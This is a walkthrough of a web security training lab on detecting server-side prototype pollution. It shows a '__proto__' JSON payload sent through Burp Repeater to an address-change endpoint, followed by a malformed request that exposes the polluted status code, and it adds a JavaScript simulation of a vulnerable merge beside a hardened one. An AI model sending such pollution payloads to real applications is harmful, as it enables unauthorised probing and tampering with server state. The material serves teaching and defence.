Lab: Detecting server-side prototype pollution without polluted property reflection
Study the address change feature
After starting the exercise, the store should look similar to the following illustration.

First we log in to the store with our credentials wiener:peter. To do this, we click on the My account link and fill out the login form.


After logging in successfully, we have access to our billing and delivery address. Here we change the content of the Line 1 text field from Vienna HQ to Hacker and Victim Inc. and click on the Submit button to send the form.

In the next step, we switch to Burp Proxy and open the HTTP history. There we search for the request POST /my-account/change-address.

We see that when the form is sent, the data from the fields is sent to the server as JSON. The server responds with a JSON object that represents our user. We send this request to Burp Repeater using the key combination CTRL+R.
In Burp Repeater, we add a new property to the existing JSON. To do this, we use the following property:

  "__proto__": {
    "foo":"bar"
  }

The JSON in our request should now have the following appearance:

  {
    "address_line_1":"Hacker and Victim Inc.",
    "address_line_2":"One Wiener Way",
    "city":"Wienerville",
    "postcode":"BU1 1RP",
    "country":"UK",
    "sessionId":"o3w1BQQd0tqfIEcVe9l8hVUzTz3VzxVO",
    "__proto__": {
      "foo":"bar"
    }
  }

We now send the request to the application and see in the response that our property is not reflected.

Identify a prototype pollution source
We now modify the JSON in our request so that we cause a syntax error. To do this, we simply remove a comma after any property.

After sending the request, we receive a response with an error message containing a JSON error object. If we take a closer look at the response, we see that it is an HTTP/2 500 Internal Server Error, while the JSON object reports the status code 400.
Back in our request, we first undo the change that caused the syntax error; in this example, we put the missing comma back. Then we adjust the property we inserted by changing foo to status and bar to 555. The number 555 is an HTTP status code; if you choose a different number, make sure it lies in the range 400 to 599, since these two ranges (4xx and 5xx) are reserved for client and server errors. Your request should now look like this:

After sending, we see that our response is again an HTTP/2 200 OK containing our user object. We now remove the comma again to cause another syntax error. If you used a different syntax error earlier, you can reuse it here.

When we send this request to the application, the exercise is marked as solved. There is a discrepancy, however: we would expect "status": "555" to appear in our response, but here we see "status":500.

Nevertheless, we successfully completed the exercise.
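To show why this probe works at all, here is an added example in plain JavaScript (not code from the lab, the write-up or PortSwigger): a toy version of the server's recursive merge and its generic error handler, replayed against the two requests from the steps above, with a hardened merge that drops the __proto__ key beside it. The request bodies, the user object and the function names (mergeInto, handleChangeAddress, simulate) are constructed for this example.

```javascript
// Added example, not code from the lab: a toy model of the server-side merge and
// generic error handler that the status-code probe relies on. unsafeMerge really
// pollutes Object.prototype of this process; simulate() removes the property again.
// Request 1 (constructed): well-formed JSON carrying the "__proto__" payload.
const POLLUTING_BODY =
  '{"address_line_1":"Hacker and Victim Inc.","city":"Wienerville","__proto__":{"status":555}}';
// Request 2 (constructed): the same body with one comma removed, so JSON.parse throws.
const MALFORMED_BODY = '{"address_line_1":"Hacker and Victim Inc." "city":"Wienerville"}';
// Recursive merge of user-supplied JSON into an existing object. Without a block
// list, target["__proto__"] resolves to Object.prototype and the nested values
// (here "status": 555) land on every object in the process.
function mergeInto(target, source, blockedKeys) {
  for (const key of Object.keys(source)) {
    if (blockedKeys.has(key)) continue;
    const value = source[key];
    if (typeof value === 'object' && value !== null) {
      if (typeof target[key] !== 'object' || target[key] === null) target[key] = {};
      mergeInto(target[key], value, blockedKeys);
    } else {
      target[key] = value;
    }
  }
  return target;
}
const unsafeMerge = (t, s) => mergeInto(t, s, new Set()); // vulnerable: blocks nothing
const safeMerge = (t, s) => mergeInto(t, s, new Set(['__proto__', 'constructor', 'prototype']));

// One POST /my-account/change-address: parse, merge into the user, reply. The catch
// branch mimics a generic error handler that reads err.status; a SyntaxError has no
// own "status" property, so the lookup falls through to Object.prototype.
function handleChangeAddress(merge, user, rawBody) {
  try {
    merge(user, JSON.parse(rawBody));
    return { httpStatus: 200, body: user };
  } catch (err) {
    return { httpStatus: err.status || 500, body: { error: err.message } };
  }
}
// Replays the lab's two-step probe and returns the HTTP status of each reply.
function simulate(merge) {
  const user = { username: 'wiener', address_line_1: 'Vienna HQ' };
  try {
    return [POLLUTING_BODY, MALFORMED_BODY].map((raw) => handleChangeAddress(merge, user, raw).httpStatus);
  } finally {
    delete Object.prototype.status; // undo the pollution so later objects are clean
  }
}
console.log('unsafe merge:', simulate(unsafeMerge)); // [ 200, 555 ]
console.log('safe merge:  ', simulate(safeMerge));   // [ 200, 500 ]
```

The second status is the only observable difference between the two merges: the polluting request itself returns 200 in both cases, which is exactly why the reflection-free probe needs the follow-up syntax error.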
